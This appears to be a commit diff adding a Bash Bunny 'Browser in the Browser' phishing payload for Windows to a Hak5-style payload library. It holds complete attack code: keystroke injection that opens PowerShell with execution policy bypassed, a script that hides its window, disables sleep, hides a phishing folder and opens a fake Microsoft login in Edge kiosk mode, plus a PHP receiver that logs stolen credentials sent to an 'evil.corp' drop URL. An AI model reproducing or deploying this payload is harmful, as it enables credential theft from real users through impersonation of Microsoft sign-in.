Add "Microsoft Windows" Browser in the Browser (#534)

1) Hide "PowerShell" window.
2) Change "monitor-timeout (AC and DC)" at NEVER with "powercfg" utility.
3) Change "standby-timeout (AC and DC)" at NEVER with "powercfg" utility.
4) Copies and hides the phishing folder in the current user's directory.
5) Full screen opening of the phishing HTML page using "Microsoft Edge" in kiosk mode.
6) The username/password will be sent by HTTP POST to the URL specified in the "DROP_URL" constant.

payloads/library/phishing/windows_browser-in-the-browser/README.md

@@ -0,0 +1,95 @@
+# "Microsoft Windows" Browser in the Browser (BitB)
+
+- Title:         "Microsoft Windows" Browser in the Browser (BitB)
+- Author:        TW-D
+- Version:       1.0
+- Target:        Microsoft Windows
+- Category:      Phishing
+
+## Description
+
+1) Hide "PowerShell" window.
+2) Change "monitor-timeout (AC and DC)" at NEVER with "powercfg" utility.
+3) Change "standby-timeout (AC and DC)" at NEVER with "powercfg" utility.
+4) Copies and hides the phishing folder in the current user's directory.
+5) Full screen opening of the phishing HTML page using "Microsoft Edge" in kiosk mode.
+6) The username/password will be sent by HTTP POST to the URL specified in the "DROP_URL" constant.
+
+## Configuration
+
+From "payload.txt" change the values of the following constants :
+```bash
+
+######## INITIALIZATION ########
+
+readonly BB_LABEL="BashBunny"
+
+# Choose "dark" or "light"
+#
+readonly BITB_THEME="dark"
+
+# Title of the window
+#
+readonly BITB_TITLE="Outlook - free personal email and calendar from Microsoft"
+
+# URL in the address bar
+#
+readonly BITB_URL="https://login.live.com/login.srf?wa=wsignin1.0&rver=7.0.6737.0&wp=MBI_SSL&wreply=https%253a%252f%252foutlook.live.com%252fowa%252f"
+
+# Content of the navigation window
+#
+readonly BITB_TEMPLATE="microsoft-account.html"
+
+# Destination of the form data
+#
+readonly DROP_URL="http://evil.corp:8080/drop.php?ZXZpbC5jb3Jw.png"
+
+
+```
+
+Example of code for the data receiver :
+```php
+<?php
+
+if (
+    $_SERVER['REQUEST_METHOD'] === 'POST'
+) {
+
+    $remote_addr = (string) $_SERVER['REMOTE_ADDR'];
+    $user_agent = (string) $_SERVER['HTTP_USER_AGENT'];
+    $username_password = (string) implode(',', $_POST);
+
+    /*
+        touch ./aGFrNQ_loot.log
+        chown www-data:www-data ./aGFrNQ_loot.log
+    */
+    $loot = fopen('aGFrNQ_loot.log', 'a');
+    fwrite($loot, "##\n");
+    fwrite($loot, $remote_addr . "\n");
+    fwrite($loot, $user_agent . "\n");
+    fwrite($loot, $username_password . "\n");
+    fwrite($loot, "##\n");
+    fclose($loot);
+
+}
+
+http_response_code(302);
+header('Location: https://hak5.org/');
+exit;
+
+?>
+```
+
+## Screenshots
+
+>
+> Dark Theme
+>
+
+![bitb-dark](./readme_files/bitb-dark.png)
+
+>
+> Light Theme
+>
+
+![bitb-light](./readme_files/bitb-light.png)

payloads/library/phishing/windows_browser-in-the-browser/payload.ps1

@@ -0,0 +1,55 @@
+#
+# Author:       TW-D
+# Version:      1.0
+#
+
+param (
+    [string] $BITB_THEME,
+    [string] $BITB_TITLE,
+    [string] $BITB_URL,
+    [string] $BITB_TEMPLATE,
+    [string] $DROP_URL
+)
+
+# Hide "PowerShell" window.
+#
+$Script:showWindowAsync = Add-Type -MemberDefinition @"
+[DllImport("user32.dll")]
+public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);
+"@ -Name "Win32ShowWindowAsync" -Namespace Win32Functions -PassThru
+$showWindowAsync::ShowWindowAsync((Get-Process -Id $pid).MainWindowHandle, 0) | Out-Null
+
+If ($BITB_THEME -And $BITB_TITLE -And $BITB_URL -And $BITB_TEMPLATE -And $DROP_URL) {
+
+    # Change "monitor-timeout (AC and DC)" at NEVER with "powercfg" utility.
+    #
+    (powercfg /Change monitor-timeout-ac 0); (powercfg /Change monitor-timeout-dc 0)
+
+    # Change "standby-timeout (AC and DC)" at NEVER with "powercfg" utility.
+    #
+    (powercfg /Change standby-timeout-ac 0); (powercfg /Change standby-timeout-dc 0)
+
+    # Copies and hides the phishing folder in the current user's directory.
+    #
+    $random_name = ( -join ( (0x30..0x39) + ( 0x41..0x5A) + ( 0x61..0x7A) | Get-Random -Count 8  | % {[char] $_} ) )
+    $phishing_path = "${HOME}\${random_name}\"
+    Copy-Item -Path ".\phishing_files\" -Destination "${phishing_path}" -Recurse
+    (Get-Item "${phishing_path}" -Force).Attributes = "Hidden"
+
+    # Builds the configuration file for the phishing page.
+    #
+    "const BITB_THEME = '${BITB_THEME}';" | Out-File -FilePath "${phishing_path}TMP.js"
+    "const BITB_TITLE = '${BITB_TITLE}';" | Out-File -FilePath "${phishing_path}TMP.js" -Append
+    "const BITB_URL = '${BITB_URL}';" | Out-File -FilePath "${phishing_path}TMP.js" -Append
+    "const BITB_TEMPLATE = '${BITB_TEMPLATE}';" | Out-File -FilePath "${phishing_path}TMP.js" -Append
+
+    # Updating the destination of the form data.
+    #
+    (Get-Content "${phishing_path}templates\${BITB_TEMPLATE}") -Replace "--DROP_URL--", "${DROP_URL}" | Set-Content "${phishing_path}templates\${BITB_TEMPLATE}"
+
+    # Full screen opening of the phishing HTML page using "Microsoft Edge" in kiosk mode.
+    #
+    $phishing_path = ($phishing_path -Replace '[\\/]', '/')
+    & "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --app="file:///${phishing_path}index.html" --kiosk --kiosk-idle-timeout-minutes=0 --edge-kiosk-type=fullscreen --no-first-run
+
+}

payloads/library/phishing/windows_browser-in-the-browser/payload.txt

@@ -0,0 +1,103 @@
+#!/bin/bash
+#
+# Title:            "Microsoft Windows" Browser in the Browser (BitB)
+#
+# Description:     
+#                   1) Hide "PowerShell" window.
+#                   2) Change "monitor-timeout (AC and DC)" at NEVER with "powercfg" utility.
+#                   3) Change "standby-timeout (AC and DC)" at NEVER with "powercfg" utility.
+#                   4) Copies and hides the phishing folder in the current user's directory.
+#                   5) Full screen opening of the phishing HTML page using "Microsoft Edge" in kiosk mode.
+#                   6) The username/password will be sent by HTTP POST to the URL specified in the "DROP_URL" constant.
+#
+# Author:           TW-D
+# Version:          1.0
+# Category:         Phishing
+# Target:           Microsoft Windows
+# Attackmodes:      HID and STORAGE
+#
+# TESTED ON
+# ===============
+# Microsoft Windows 10 Family Version 20H2 (PowerShell 5.1)
+# Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1)
+#
+# NOTE
+# ===============
+# Microsoft Edge is required on the target machine.
+#
+# STATUS
+# ===============
+# Magenta solid ................................... SETUP
+# Yellow single blink ............................. ATTACK
+# Yellow double blink ............................. STAGE2
+# Yellow triple blink ............................. STAGE3
+# White fast blink ................................ CLEANUP
+# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
+#
+
+######## INITIALIZATION ########
+
+readonly BB_LABEL="BashBunny"
+
+# Choose "dark" or "light"
+#
+readonly BITB_THEME="dark"
+
+# Title of the window
+#
+readonly BITB_TITLE="Outlook - free personal email and calendar from Microsoft"
+
+# URL in the address bar
+#
+readonly BITB_URL="https://login.live.com/login.srf?wa=wsignin1.0&rver=7.0.6737.0&wp=MBI_SSL&wreply=https%253a%252f%252foutlook.live.com%252fowa%252f"
+
+# Content of the navigation window
+#
+readonly BITB_TEMPLATE="microsoft-account.html"
+
+# Destination of the form data
+#
+readonly DROP_URL="http://evil.corp:8080/drop.php?ZXZpbC5jb3Jw.png"
+
+######## SETUP ########
+
+LED SETUP
+
+ATTACKMODE HID STORAGE
+GET SWITCH_POSITION
+
+######## ATTACK ########
+
+LED ATTACK
+
+Q DELAY 8000
+RUN WIN "powershell -NoLogo -NoProfile -ExecutionPolicy Bypass"
+Q DELAY 4000
+
+LED STAGE2
+
+Q STRING "\$BB_VOLUME = \"\$((Get-WmiObject -Class Win32_Volume -Filter \"Label LIKE '${BB_LABEL}'\").Name)payloads\\${SWITCH_POSITION}\\\""
+Q ENTER
+Q DELAY 3000
+
+Q STRING "CD \"\${BB_VOLUME}\""
+Q ENTER
+Q DELAY 1500
+
+LED STAGE3
+
+Q STRING ".\payload.ps1 -BITB_THEME \"${BITB_THEME}\" -BITB_TITLE \"${BITB_TITLE}\" -BITB_URL \"${BITB_URL}\" -BITB_TEMPLATE \"${BITB_TEMPLATE}\" -DROP_URL \"${DROP_URL}\""
+Q ENTER
+Q DELAY 3000
+
+######## CLEANUP ########
+
+LED CLEANUP
+
+sync
+
+######## FINISH ########
+
+LED FINISH
+
+shutdown -h 0

payloads/library/phishing/windows_browser-in-the-browser/phishing_files/assets/css/main.css

@@ -0,0 +1,40 @@
+#draggable {
+    font-family: "Segoe UI Light" !important;
+}
+
+#microsoft-logo {
+    height: 40px;
+}
+
+#title-text {
+    margin-left: 5px;
+}
+
+#minimize {
+    font-size: 20px;
+}
+
+#maximize {
+    font-size: 30px;
+}
+
+#container-minimize:hover, #container-maximize:hover {
+    opacity: 0.5;
+}
+
+#container-exit:hover {
+    background-color: red;
+}
+
+#exit {
+    font-size: 20px;
+}
+
+#ssl-logo {
+    height: 40px;
+}
+
+#phishing-iframe {
+    width: 100%;
+    height: 75vh;
+}

payloads/library/phishing/windows_browser-in-the-browser/phishing_files/assets/img/logo.svg

@@ -0,0 +1 @@
+<svg enable-background="new 0 0 2499.6 2500" viewBox="0 0 2499.6 2500" xmlns="http://www.w3.org/2000/svg"><path d="m1187.9 1187.9h-1187.9v-1187.9h1187.9z" fill="#f1511b"/><path d="m2499.6 1187.9h-1188v-1187.9h1187.9v1187.9z" fill="#80cc28"/><path d="m1187.9 2500h-1187.9v-1187.9h1187.9z" fill="#00adef"/><path d="m2499.6 2500h-1188v-1187.9h1187.9v1187.9z" fill="#fbbc09"/></svg>

payloads/library/phishing/windows_browser-in-the-browser/phishing_files/assets/img/ssl.svg

@@ -0,0 +1,4 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<svg width="752pt" height="752pt" version="1.1" viewBox="0 0 752 752" xmlns="http://www.w3.org/2000/svg">
+ <path d="m510.97 316.8h-12.785l-0.003906-62.512c0-56.828-46.41-103.24-103.24-103.24h-37.887c-56.828 0-103.24 46.41-103.24 103.24v62.039h-12.785c-25.574 0-45.938 20.836-45.938 45.938v192.27c0 25.574 20.836 45.938 45.938 45.938h270.41c25.574 0 45.938-20.836 45.938-45.938l0.003906-191.8c0-25.574-20.836-45.938-46.41-45.938zm-195.12-62.512c0-22.73 18.469-41.203 41.203-41.203h37.887c22.73 0 41.203 18.469 41.203 41.203v62.039h-120.29z" fill="#A6A6B2"/>
+</svg>

payloads/library/phishing/windows_browser-in-the-browser/phishing_files/assets/js/actions.js

@@ -0,0 +1,19 @@
+var draggable;
+draggable = document.querySelector('#draggable');
+
+$('#draggable').draggable();
+
+document.querySelector('#container-minimize').onclick = function() {
+    draggable.classList.remove('w-75');
+    draggable.classList.add('w-50');
+}
+
+document.querySelector('#container-maximize').onclick = function() {
+    draggable.classList.remove('w-50');
+    draggable.classList.add('w-75');
+}
+
+document.querySelector('#container-exit').onclick = function() {
+    draggable.style.display = 'none';
+    setTimeout(function() { location.reload();	}, 2000);
+}

payloads/library/phishing/windows_browser-in-the-browser/phishing_files/assets/js/dispatch.js

@@ -0,0 +1,17 @@
+var theme;
+
+switch (BITB_THEME) {
+    case 'dark':
+        theme = ' bg-dark text-white';
+        break;
+    case 'light':
+        theme = ' bg-light text-dark';
+        break;
+    default:
+        theme = ' bg-dark text-white';
+}
+
+document.querySelectorAll('.row').forEach((row) => (row.className += theme));
+document.querySelector('#title-text').innerText = BITB_TITLE;
+document.querySelector('#url-input').value = BITB_URL;
+document.querySelector('#phishing-iframe').src = ('./templates/' + BITB_TEMPLATE);

payloads/library/phishing/windows_browser-in-the-browser/phishing_files/index.html

@@ -0,0 +1,46 @@
+<!DOCTYPE html>
+<html lang="en">
+    <head>
+        <meta charset="UTF-8" />
+        <meta name="viewport" content="width=device-width, initial-scale=1" />
+        <link rel="stylesheet" type="text/css" href="./assets/css/main.css?version=1.0.0" />
+        <link rel="stylesheet" type="text/css" href="./assets/framework/bootstrap.min.css?version=5.1.3" />
+    </head>
+    <body>
+        <main class="container w-50 mt-4 shadow" id="draggable">
+            <div class="row p-3 text-center rounded-top">
+                <div class="col-1 align-self-center">
+                    <img id="microsoft-logo" src="./assets/img/logo.svg" alt="" />
+                </div>
+                <div class="col-8 align-self-center text-start">
+                    <div class="fw-bold" id="title-text"></div>
+                </div>
+                <div class="col-1 align-self-center pt-3" id="container-minimize">
+                    <div id="minimize">&#8212;</div>
+                </div>
+                <div class="col-1 align-self-center p-3" id="container-maximize">
+                    <div id="maximize">□</div>
+                </div>
+                <div class="col-1 align-self-center p-3" id="container-exit">
+                    <div id="exit">X</div>
+                </div>
+            </div>
+            <div class="row p-3 text-center">
+                <div class="col-1 align-self-center">
+                    <img id="ssl-logo" src="./assets/img/ssl.svg" alt="" />
+                </div>
+                <div class="col-11 align-self-center">
+                    <input class="form-control" type="text" id="url-input" disabled />
+                </div>
+            </div>
+            <div>
+                <iframe id="phishing-iframe" frameBorder="0"></iframe>
+            </div>
+        </main>
+        <script type="text/javascript" src="./assets/libraries/jquery-3.6.0.min.js?version=3.6.0"></script>
+        <script type="text/javascript" src="./assets/libraries/jquery-ui.min.js?version=1.13.0"></script>
+        <script type="text/javascript" src="./assets/js/actions.js?version=1.0.0"></script>
+        <script type="text/javascript" src="./TMP.js?version=1.0.0"></script>
+        <script type="text/javascript" src="./assets/js/dispatch.js?version=1.0.0"></script>
+    </body>
+</html>